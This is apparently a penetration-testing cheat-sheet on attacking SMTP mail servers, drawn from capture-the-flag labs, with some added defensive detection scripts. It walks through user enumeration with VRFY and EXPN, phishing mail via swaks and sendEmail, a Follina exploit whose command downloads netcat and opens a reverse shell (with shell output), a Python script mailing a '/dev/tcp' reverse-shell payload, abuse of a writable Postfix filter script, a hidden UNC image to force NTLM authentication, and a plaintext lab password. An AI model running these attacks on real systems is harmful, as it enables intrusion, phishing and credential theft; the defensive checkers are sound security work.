25, 465, 587 - SMTP(S)
Banner Grabbing
// SMTP
nc -vn <IP> 25
// SMTPS
openssl s_client -crlf -connect smtp.mailgun.org:465 #SSL/TLS without starttls command
openssl s_client -starttls smtp -crlf -connect smtp.mailgun.org:587
Find Organization MX Server
dig +short mx google.com
Remote - Connect to SMTP server with netcat
kyle@writer:/etc/postfix$ nc localhost 25
220 writer.htb ESMTP Postfix (Ubuntu)
HELO writer.htb
250 writer.htb
MAIL FROM:<kyle@writer.htb>
250 2.1.0 Ok
RCPT TO:<kyle@writer.htb>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
Subject: This is a email.
.
250 2.0.0 Ok: queued as 9FF0C802
Remote - NTLM Auth
$ telnet example.com 587
220 example.com SMTP Server Banner
>> HELO
250 example.com Hello [x.x.x.x]
>> AUTH NTLM
334 NTLM supported
>> TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
334 TlRMTVNTUAACAAAACgAKADgAAAAFgooCBqqVKFrKPCMAAAAAAAAAAEgASABCAAAABgOAJQAAAA9JAEkAUwAwADEAAgAKAEkASQBTADAAMQABAAoASQBJAFMAMAAxAAQACgBJAEkAUwAwADEAAwAKAEkASQBTADAAMQAHAAgAHwMI0VPy1QEAAAAA
Remote - Enum Users
$ telnet 10.0.10.1 25
220 myhost ESMTP Sendmail 8.9.3
HELO x
250 myhost Hello [10.0.0.99], pleased to meet you
MAIL FROM:test@test.org
250 2.1.0 test@test.org... Sender ok
// RCPT TO
RCPT TO:test
550 5.1.1 test... User unknown
RCPT TO:admin
550 5.1.1 admin... User unknown
RCPT TO:ed
250 2.1.5 ed... Recipient ok
// VRFY
VRFY root
250 Super-User <root@myhost>
VRFY blah
550 blah... User unknown
// EXPN
EXPN test
550 5.1.1 test... User unknown
EXPN root
250 2.1.5 <ed.williams@myhost>
EXPN sshd
250 2.1.5 sshd privsep <sshd@mail2>
Local - Setup Postfix SMTP server
// Install & Configure
$ sudo apt install mailutils postfix
$ sudo postconf -e 'mydestination = $myhostname, void, localhost.localdomain, localhost'   # single quotes: $myhostname must reach Postfix unexpanded
$ sudo postconf -e "mynetworks = 127.0.0.0/8, 10.10.14.0/24"
$ sudo postconf -e "inet_interfaces = all"
$ sudo postconf -e "inet_protocols = ipv4"
$ sudo postconf -e "recipient_delimiter = +"
$ sudo postconf -e "lmtp_host_lookup = native"
$ sudo postconf -e "smtp_host_lookup = native"
$ service postfix restart
// Send mail
$ telnet localhost 25
220 void.xxxxx.se ESMTP Postfix (Debian/GNU)
ehlo localhost
250-void.xxxxx.se
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING
mail from: void@void
250 2.1.0 Ok
rcpt to: itsupport@outdated.htb
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
Subject: Phishing
http://10.10.14.6:8080
.
250 2.0.0 Ok: queued as 0C51812101C
quit
221 2.0.0 Bye
// Verify that status=sent
$ cat /var/log/mail.log
[... snip ...]
Aug 15 10:51:28 void postfix/smtp[7917]: 0C51812101C: to=<itsupport@outdated.htb>, relay=outdated.htb[10.10.11.175]:25, delay=54, delays=43/0.01/0.08/11, dsn=2.0.0, status=sent (250 Queued (10.432 seconds))
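The EHLO reply above (and the VRFY/EXPN responses in the enumeration section) advertise exactly the settings a server review should catch. The following is an added example, not code from this page: it parses an EHLO reply into its keywords and reports VRFY/EXPN exposure, a missing STARTTLS, and AUTH offered in the clear. The two sample replies are constructed from the Postfix and swaks output on this page; the hostname mail.example.test is a placeholder.

```python
import re

# Constructed samples (copied from the sessions on this page), not live output.
POSTFIX_EHLO = """250-void.xxxxx.se
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250-DSN
250-SMTPUTF8
250 CHUNKING"""

# Constructed: a server offering AUTH LOGIN with no STARTTLS, as the swaks target did.
PLAIN_AUTH_EHLO = """250-mail.example.test
250-SIZE 20480000
250-AUTH LOGIN
250 HELP"""

# "250-KEYWORD params" (continuation line) or "250 KEYWORD params" (final line)
_LINE = re.compile(r"^250[ -](\S+)(?:\s+(.*))?$")


def parse_ehlo(text):
    """Return (hostname, {KEYWORD: [params]}) from an EHLO reply.

    The first 250 line carries the server's greeting hostname, not a keyword.
    """
    hostname, caps = None, {}
    for raw in text.splitlines():
        m = _LINE.match(raw.strip())
        if not m:
            continue
        if hostname is None:
            hostname = m.group(1)
            continue
        caps[m.group(1).upper()] = (m.group(2) or "").split()
    return hostname, caps


def audit_ehlo(text, port=25):
    """List the weaknesses an EHLO reply advertises.

    Port 465 is implicit TLS, so the STARTTLS-related checks are skipped there.
    """
    hostname, caps = parse_ehlo(text)
    findings = []
    if "VRFY" in caps:
        findings.append("VRFY advertised: user enumeration (Postfix: disable_vrfy_command = yes)")
    if "EXPN" in caps:
        findings.append("EXPN advertised: alias/list expansion leaks addresses")
    if port != 465 and "STARTTLS" not in caps:
        findings.append("no STARTTLS: credentials and mail cross the wire in the clear")
    if "AUTH" in caps and port != 465 and "STARTTLS" not in caps:
        findings.append("AUTH %s offered without TLS (Postfix: smtpd_tls_auth_only = yes)"
                        % " ".join(caps["AUTH"]))
    return hostname, findings


if __name__ == "__main__":
    for sample in (POSTFIX_EHLO, PLAIN_AUTH_EHLO):
        host, findings = audit_ehlo(sample)
        print(host, findings or "no findings")
```

Feed it the text you captured with nc or openssl s_client; the Postfix parameter names in the findings are the ones that switch the behaviour off.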
Local - Swaks
$ swaks --to itsupport@outdated.htb --from 0xpthree@exploit.se --server mail.outdated.htb --body "http://10.10.14.6/pwn.html"
=== Trying mail.outdated.htb:25...
=== Connected to mail.outdated.htb.
<- 220 mail.outdated.htb ESMTP
-> EHLO void
<- 250-mail.outdated.htb
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<0xpthree@exploit.se>
<- 250 OK
-> RCPT TO:<itsupport@outdated.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Mon, 15 Aug 2022 15:14:51 +0200
-> To: itsupport@outdated.htb
-> From: 0xpthree@exploit.se
-> Subject: test Mon, 15 Aug 2022 15:14:51 +0200
-> Message-Id: <20220815151451.031141@void>
-> X-Mailer: swaks v20201014.0 jetmore.org/john/code/swaks/
->
-> http://10.10.14.6/pwn.html
->
->
-> .
<- 250 Queued (10.406 seconds)
-> QUIT
<- 221 goodbye
Local - sendEmail (MSDT Follina example)
// Script used: https://github.com/JohnHammond/msdt-follina
//
// follina.py row 111:
// command = f"""Invoke-WebRequest http://10.10.14.2:4444/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
$ ls -al /tmp/67gup9zc/www
total 64
drwxr-xr-x 2 void void 4096 Aug 19 13:04 .
drwxr-xr-x 4 void void 4096 Aug 19 12:54 ..
-rw-r--r-- 1 void void 4689 Aug 19 12:54 index.html
-rwxr-xr-x 1 void void 45272 Aug 19 13:04 nc64.exe
$ sendEmail -t itsupport@outdated.htb -f 0xpthree@exploit.se -s mail.outdated.htb -u PleaseWork -m 'http://10.10.14.2/'
Aug 19 12:54:31 void sendEmail[17349]: Email was sent successfully!
$ python3 follina.py -i tun0 -p 80 -r 4444
[+] copied staging doc /tmp/67gup9zc
[+] created maldoc ./follina.doc
[+] serving html payload on :80
[+] starting 'nc -lvnp 4444'
listening on [any] 4444 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.11.175] 49822
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.
C:\Users\btables\AppData\Local\Temp\SDIAG_9fb3a047-99c4-4779-8d48-a154f6f5936e> whoami
outdated\btables
Local - Thunderbird GUI
An alternative when you need to read another user's inbox and/or sent mail. Needs creds!
Download and install the email client Thunderbird. On first start, enter the following:
Your name: Paul Byrd
Email Address: paulbyrd@sneakymailer.htb
Password: ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
Press 'Continue'. It will fail to find the server; change the settings to the following:
INCOMING
Protocol: IMAP
Server Hostname: sneakymailer.htb
Port: 143
SSL: None
Authentication: Normal Password
OUTGOING
Protocol: SMTP
Server Hostname: sneakymailer.htb
Port: 25
SSL: None
Authentication: Normal Password
Press 'Done', check 'I understand the risks' and then 'Done'. Restart Thunderbird and you'll be connected to Paul Byrd's mailbox.
Local - Send mail using Python
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import smtplib
import sys

lhost = "127.0.0.1"
lport = 443
rhost = "192.168.1.1"
rport = 25  # or 587 for submission; 465 is implicit TLS and needs smtplib.SMTP_SSL instead of starttls()

# create message object instance
msg = MIMEMultipart()

# set up the parameters of the message
password = ""
msg['From'] = "attacker@local"
msg['To'] = "victim@local"
msg['Subject'] = "This is not a drill!"

# payload
message = "<?php system('bash -i >& /dev/tcp/%s/%d 0>&1'); ?>" % (lhost, lport)
print("[*] Payload is generated : %s" % message)
msg.attach(MIMEText(message, 'plain'))

server = smtplib.SMTP(host=rhost, port=rport)
if server.noop()[0] != 250:
    print("[-] Connection Error")
    sys.exit(1)
server.starttls()
# Uncomment if logging in with authentication
# server.login(msg['From'], password)
server.sendmail(msg['From'], msg['To'], msg.as_string())
server.quit()
print("[***] successfully sent email to %s" % msg['To'])
Interesting Files
sendmail.cf
submit.cf
/etc/postfix/master.cf
C:\Nuxeo\conf\Catalina\localhost\nuxeo.xml
Postfix master.cf
Defines the Postfix transports; pipe(8) entries run the command given in argv, as the given user, whenever mail is routed through that transport.
$ cat /etc/postfix/master.cf
flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
# user=cyrus argv=/cyrus/bin/deliver -e -r ${sender} -m ${extension} ${user}
# flags=R user=cyrus argv=/cyrus/bin/deliver -e -m ${extension} ${user}
flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
flags=FR user=list argv=/usr/lib/mailman/bin/postfix-to-mailman.py
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
The last line means /etc/postfix/disclaimer is executed as user john when a new mail is received.
$ ls -al | grep discl
-rwxrwxr-x 1 root filter 1022 Sep 10 13:44 disclaimer
The script is group-writable by the filter group. Edit the disclaimer file to run whatever bash commands you'd like, then send an email to trigger it.
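The two things worth checking on such a host are which commands master.cf pipes mail into, and who can modify those commands. The following is an added example, not code from this page: it parses the argv= entries quoted above and checks the mode string of an ls -l line for group- or world-writable scripts. The sample input is constructed from the page's own master.cf and ls output.

```python
import re

# Constructed sample: the argv lines quoted from /etc/postfix/master.cf above,
# including a commented-out cyrus entry to show that inactive lines are skipped.
MASTER_CF_SAMPLE = """\
flags=DRhu user=vmail argv=/usr/bin/maildrop -d ${recipient}
# user=cyrus argv=/cyrus/bin/deliver -e -r ${sender} -m ${extension} ${user}
flags=Fqhu user=uucp argv=uux -r -n -z -a$sender - $nexthop!rmail ($recipient)
flags=Rq user=john argv=/etc/postfix/disclaimer -f ${sender} -- ${recipient}
"""

# Constructed sample: the 'ls -al' line for the disclaimer script shown above
LS_LINE = "-rwxrwxr-x 1 root filter 1022 Sep 10 13:44 disclaimer"

_ARGV = re.compile(r"\buser=(\S+).*?\bargv=(.*)$")


def pipe_transports(master_cf_text):
    """Return [(user, command, argv)] for every active pipe transport."""
    found = []
    for line in master_cf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = _ARGV.search(line)
        if not m:
            continue
        user, argv = m.group(1), m.group(2).strip()
        found.append((user, argv.split()[0], argv))
    return found


def mode_risks(ls_line):
    """Flag a script that users other than its owner can rewrite.

    The mode string is the first field of an 'ls -l' line (e.g. -rwxrwxr-x):
    positions 5 and 8 are the group and world write bits. A group-writable
    script means every member of that group controls what Postfix executes.
    """
    fields = ls_line.split()
    mode, group, name = fields[0], fields[3], fields[-1]
    findings = []
    if mode[5] == "w":
        findings.append("%s is group-writable (group %s)" % (name, group))
    if mode[8] == "w":
        findings.append("%s is world-writable" % name)
    return findings


if __name__ == "__main__":
    for user, command, _ in pipe_transports(MASTER_CF_SAMPLE):
        print("transport runs %s as %s" % (command, user))
    for finding in mode_risks(LS_LINE):
        print("!!", finding)
```

On a real host, run pipe_transports over /etc/postfix/master.cf and mode_risks over the ls -l line of each command it reports; anything outside the package-managed paths, or writable by a group other than root, deserves a look.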
Force NTLM Authentication
In the real world, it's unlikely you can just jump onto the console of a machine as a privileged user and authenticate to your malicious SMB server. Nor can you do NTLM authentication on demand, but there are lots of techniques to "force" the user to do it unknowingly.
1x1 Images in Emails:
<img src="\\10.10.17.231\test.ico" height="1" width="1" />
A sneaky way would be to modify the email signature, so that even legitimate emails sent will trigger NTLM authentication from every recipient who reads them.
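The image tag above is also what a mail gateway or analyst should look for. The following is an added example, not code from this page: an html.parser based check that pulls every URL-bearing attribute out of an HTML body and reports those pointing at a UNC path or file:// URL, singling out 1x1 images. The sample body is constructed around the page's own tag; the IP and hostnames in it are the page's value and placeholders.

```python
from html.parser import HTMLParser
import re

# Constructed sample body: the page's 1x1 UNC image, a normal https image and a
# file:// link. The doubled backslashes are Python escaping for \\10.10.17.231\test.ico.
SAMPLE_HTML = """<html><body><p>Hi</p>
<img src="\\\\10.10.17.231\\test.ico" height="1" width="1" />
<img src="https://cdn.example.test/logo.png">
<a href="file://10.10.17.231/share/doc.docx">report</a>
</body></html>"""

# \\host\share... or file:// at the start of the value
_UNC = re.compile(r"^(\\\\[^\\]+\\|file://)", re.IGNORECASE)
_URL_ATTRS = ("src", "href", "background", "data", "poster")


class _RefCollector(HTMLParser):
    """Collect (tag, attribute, value, is_tiny) for every URL-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        tiny = a.get("height") == "1" or a.get("width") == "1"
        for name in _URL_ATTRS:
            if a.get(name):
                self.refs.append((tag, name, a[name], tiny))


def unc_references(html_text):
    """Return the collected references whose value is a UNC path or file:// URL."""
    p = _RefCollector()
    p.feed(html_text)
    p.close()
    return [r for r in p.refs if _UNC.match(r[2].strip())]


def classify(html_text):
    """Verdict string for a message body: clean, or why it is suspicious."""
    refs = unc_references(html_text)
    if not refs:
        return "clean"
    if any(tag == "img" and tiny for tag, _, _, tiny in refs):
        return "suspicious: hidden image points at a UNC path"
    return "suspicious: UNC/file reference in %s" % ", ".join(sorted({t for t, _, _, _ in refs}))


if __name__ == "__main__":
    for tag, attr, value, tiny in unc_references(SAMPLE_HTML):
        print("<%s %s=%r>%s" % (tag, attr, value, "  (1x1)" if tiny else ""))
    print(classify(SAMPLE_HTML))
```

The same check belongs at the boundary too: block or rewrite outbound SMB (445) from user workstations so a forced authentication never leaves the network, and the hidden-image pattern is a good quarantine rule for inbound mail.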